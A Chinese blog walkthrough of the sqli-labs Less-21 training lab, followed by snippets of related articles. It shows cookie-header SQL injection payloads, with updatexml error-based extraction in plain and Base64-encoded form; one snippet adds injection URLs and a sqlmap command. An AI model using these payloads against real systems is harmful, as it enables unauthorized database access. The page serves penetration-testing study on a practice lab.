sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;

最新推荐文章于 2025-02-16 21:28:30 发布
最新推荐文章于 2025-02-16 21:28:30 发布
阅读量459 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java servlet jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaochenhang/article/details/126409850
本文详细讲述了如何通过Burpsuite抓包,利用Base64编码实现Cookie头注入,进而进行SQL注入攻击。作者展示了从发现编码方式到利用updatexml函数暴漏数据库的过程,适合学习渗透测试和安全防护的读者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、输入正确账号登陆

 

 

2、这里使用burpsuite进行抓包

 3、这里使用打算使用cookie头注入,因为它页面有cookie回显;

看到uname编码方式中有%感觉有点像url;

 

发现是base64编码

 

这里选择base64编码; 

 

 

 

4、这里闭合失败

发现提示要使用   ')   进行闭合;

    

5、这里使用base64编码: 

admin') and 1=1 -- +

YWRtaW4nKSBhbmQgMT0xIC0tICs=

 

 闭合成功

6、查一下数据库

这里利用报错查询:updatexml

admin') and updatexml(1,concat(0x7e,database(),0x7e),1) -- +

YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSAtLSAr

 

 

7、后面表名字段数据就随便爆了,如果不知道,可以看我之前的文章;

小乘杭
关注
请求注入神器 -- BurpHeaderHelper(Burpsuite、bp插件)
墨痕诉清风的博客
01-17 2653
1、加载插件: Extender -> Burp Extensions -> Add -> Select File... -> Next -> BurpHeaderHelper-xxx.jar。),通过一些浏览器的插件可以去除这些信息,但是实际的情况是总会有这些冒出来(可能是插件不给力或者我使用方式不对?BurpHeaderHelper是基于Burpsuite的插件,通过自定义规则的来对Http请求进行增删改操作。在服务器上查看对应的请求,可以看到相应的几个信息都被去除。
CustomHeader:此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录)
03-08
自定义标题-自动向整个BurpSuite HTTP请求添加新标题。 下载版本: 此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录),还可以选择要自定义的HTTP VERB。 用法 便于使用 ! :) 别忘了点击保存按钮! 变更日志 2019年10月24日-v1.0 首次公开发行 谢谢 瓦吉罗-https: 丹尼·努格拉哈(Denny Nugraha)-https:
redistemplate注入为null_「Burpsuite练兵场」SQL注入及相关实验(一)
weixin_39806779的博客
11-20 271
说到SQL注入漏洞,各位小伙伴一定是耳熟能详,作为一种常见的高危漏洞,其对于应用程序的损害是非常严重的。因此这也是一个在渗透测试的过程中具有高优先级的验证目标,所以将与之相关的实验进行优先讲述。本文是 i 春秋论坛作家「dll_s」表哥原创的Burpsuite练兵场系列文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。SQL注入原理:SQL注入的原理其实并不难理解,Web应用程...
burp爆破mysql_Burpsuite intruder模块 越过token进行爆破,包含靶场搭建
weixin_29151301的博客
01-26 316
安装靶场链接:https://pan.baidu.com/s/19X0oC63oO2cQKK6UL5xgOw提取码:yq7f下载完成放入网站根目录点击初始化安装出现错误,进行跟踪发现是数据库密码不对的问题修改成自己的mysql数据库的登录信息返回浏览器页面,单击安装,出现下面红字就ok了接下来选择token防爆破开启浏览器代理抓到登录数据包右键,选择 发送到intruder模块—》attack t...
burp爆破mysql_Burpsuite系列 -- 爆破数据库名称
weixin_35796591的博客
02-23 1594
如果不是身上有烟,下雨天我都懒得打伞,如果不是有家人,我活着都嫌烦,如果不是有你,我都不想拥有最后的一点温柔。。。---- 网易云热评靶机环境:win7、phpstudy2018、sqli一、判断注入点1、页面正常访问的情况 2、在id=1后面加上and 1=1和and1=2分别进行测试,发现and1=2返回不正常,说明该处存在注入192.168.1.129/sqli/Less-2/?id=1 a...
使用Burpsuite对http部进行分析
weixin_52347768的博客
04-14 3502
POST与GET的区别 GET: GET把参数包含在URL中 GET请求在URL中传送的参数是有长度限制的 GET产生一个TCP数据包,浏览器会把http header和data一并发送出去,服务器响应200(返回数据) GET会被浏览器进行主动缓存 POST: POST通过request body传递参数 POST请求在URL中传送的参数是没有长度限制的 POST产生两个TCP数据包,浏览器先发送header,服务器响应100 contin...
【SQL注入-14】布尔盲注的半自动化注入案例—以sqli-labs-less8为例(利用BurpSuite工具)
m0_64378913的博客
05-12 1747
目录1 概述2 布尔盲注的半自动化注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。 布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
sqli-lab-less17
Sa1nZen的博客
08-04 205
sqli-lab-less17。
【SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2207
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3152
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 2025
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
请求注入神器 -- BurpHeaderHelper.jar使用教程(Burpsuite、bp插件)
weixin_65629944的博客
04-24 1431
BurpHttpHelper中已经内置提供了一些UserAgent,可以自行通过添加UserAgent字符串进行扩展。在丢弃数据包面板(DropPacketPanel)中可以查看该过滤的数据包信息(该模块还未完善,后续会进行完善。下图为服务器视角,接收到来自客户端的请求包,下边是一个demo例子,修改host位demo.com。有时候不想一些请求发送到目标服务器,可以通过丢弃数据包面板进行配置。服务器接收到的数据包将为不同的UserAgent。在规则面板中勾选随机UA。服务器接收到的数据包如下。
Header注入
笔墨稠思
11-06 2091
靶场 当我们使用get/post注入,发现特殊的符号或单词被设置了检测,被办了,我们可以尝试检测是否存在Header注入 什么是Header注入? 我们网页,在向服务器发送请求时,会携带一些信息 如图所示,Request Headers 这部分都是请求,这里面有一部分记录的是浏览器与服务器的链接状态,还有一些是记录我们的用户信息 例如:User-Agent 记录了我们当前操作系统,浏览器内核版本 Referer记录了我们的来源 当然,请求中内容不仅仅是这些,还可能存在cookie http-X-Fo
burpsuite 自定义插件-java 版本
freshfox的博客
05-21 1149
package burp; import java.awt.Color; import java.awt.Component; import java.awt.FlowLayout; import java.awt.event.FocusEvent; import java.awt.event.FocusListener; import java.awt.event.ItemEvent; im...
SQL注入漏洞解析(环境SQLi-labs)
twowords的博客
02-04 3285
SQL注入漏洞详解 什么是SQL注入 原理: Sql注入,由于Web应用程序对用户输入数据的合法性没有判断和过滤,导致后台SQL语句拼接了用户的输入。用户可以通过构造不同的Sql语句来实现对数据库的任意操作。(如:增删改查)。 解释:当我们用户在前端浏览器页面做一些事情的时候,当需要与数据库进行交互时,比如最简单的登陆账号,web应用程序接收到我们账号密码后,需要后台有这样一个数据库的命令,去查询数据库中是否有这样的一个账号密码与之对应,然后做出判断:是否存在用户名,若存在,用户名与密码是否相匹配。然而
第一天 Burps uite 简单使用
代码审计
03-02 2584
第1章 1.1 RUL统一资源定位符 Sheme : 协议 http htttps 443 Login:passwod: 用户名 密码 不安全 @ddress:port:访问的地址 www.bing.com 443 Path/to resource:路径 知名协议 存在默认的端口 1.2 OSI七层模型 Tcp 和udp 都是传输层的协议 http : 是应用层的协议 http 超文本传输协议 http协议的特征? 无状态的协议 cookie存储在浏览器端 session存储在服务器端 1.
【SQL注入-12】http注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2764
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labsLess19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
BurpSuite操作】如何抓包修改请求基础
最新发布
liuwanqing233333的博客
02-16 260
burpsuite抓包基础操作
绕过 WAF:绕过一些 WAF 设备的 Burp 插件
qq_50854662的博客
09-22 543
我写了这个插件使用的技术博客文章在这里一会儿回来。如果存在特定标,许多 WAF 设备可能会被诱骗相信请求来自自身,因此是可信的。绕过方法的基础知识可以在此处的 HP 博客文章中找到。 一段时间以来,我一直在 Burp 中实施匹配/替换规则,以将这些标自动添加到发送到受 WAF 保护的站点的请求中,但决定创建一个插件,可用于将标添加到主动扫描、转发器请求、入侵者请求中等等。我从 Fishnet Security 那里看到这篇文章,这真的让我大开眼界。 首先,我在 Python 中实现了该插件,因为它
sqli-labs 手工注入命令
01-03
### sqli-labs 手工注入命令 对于SQL注入实验环境 `sqli-labs` 中的手工注入操作,可以通过构造特定的URL参数来实现。下面展示如何针对不同场景执行手工注入。 #### 字符型盲注实例 当面对字符型输入框时,可以尝试使用布尔盲注技术验证是否存在漏洞: ```sql http://127.0.0.1/sqli-labs-master/Less-7/?id=1') AND '1'='1'%23 ``` 此语句利用了闭合单引号并附加了一个永远成立的条件 `'1'='1'` 来测试服务器响应是否正常[^4]。 #### 使用UNION SELECT进行数据提取 为了读取当前使用的数据库名称或其他敏感信息,可采用如下方式构建查询字符串: ```sql http://127.0.0.1/sqli-labs-master/Less-5/?id=1' UNION SELECT extractvalue(1,concat('~','~',database())) -- a ``` 这条指令通过联合查询的方式试图获取数据库名,并将其作为结果集的一部分返回给客户端显示出来[^1]。 #### POST请求中的SQL注入 如果目标应用程序接受POST方法提交的数据,则需要调整攻击向量以适应这种交互模式。此时可以借助工具如Burp Suite抓包修改表单字段值来进行注入尝试;也可以直接运用自动化工具完成这一过程: ```bash sqlmap -u "http://localhost/sqli-labs/Less-15/" --batch --data "uname=admin&passwd=admin&submit=Submit" --dbs ``` 上述命令指定了登录界面所需的用户名密码等参数并通过`--data`选项传递给了sqlmap用于后续分析处理[^2]。 请注意,在实际环境中实施任何类型的渗透测试之前都应获得合法授权,未经授权擅自访问他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值